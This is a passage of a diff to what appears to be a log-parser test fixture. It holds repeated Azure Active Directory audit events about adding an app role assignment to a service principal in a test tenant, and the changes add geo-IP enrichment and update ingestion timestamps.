"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.2593808Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43117959\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"a73c1c7e-5591-4912-94cc-527ad6f48ed8\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -11150,6 +11846,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -11316,7 +12024,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125181300Z", + "ingested": "2021-12-14T14:48:43.176719679Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.2593808Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43117959\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"a73c1c7e-5591-4912-94cc-527ad6f48ed8\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -11343,6 +12051,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -11509,7 +12229,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125185500Z", + "ingested": "2021-12-14T14:48:43.176720353Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.1843731Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43117912\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"678f80a3-92c4-4bb6-83a1-1c39d5a87225\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -11536,6 +12256,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -11702,7 +12434,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125190800Z", + "ingested": "2021-12-14T14:48:43.176721127Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.1843731Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43117912\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"678f80a3-92c4-4bb6-83a1-1c39d5a87225\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -11729,6 +12461,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -11885,7 +12629,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125197800Z", + "ingested": "2021-12-14T14:48:43.176721922Z", "original": 